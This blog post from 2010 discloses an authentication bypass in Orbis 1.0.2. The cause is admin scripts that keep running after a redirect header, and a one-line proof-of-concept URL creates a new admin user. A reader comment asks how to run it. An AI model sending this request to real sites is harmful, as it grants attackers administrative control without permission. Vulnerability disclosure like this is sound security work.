This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

Orbis 1.0.2 Authentication Bypass

An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.

Exploit
Several admin related scripts fail to terminate after setting the header location field.


PoC
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@

8 comments:

  1. can u explain to me how to execute this...thanx

    ReplyDelete
  2. Thanks for providing good information,Thanks for your sharing.

    ดูหนัง

    ReplyDelete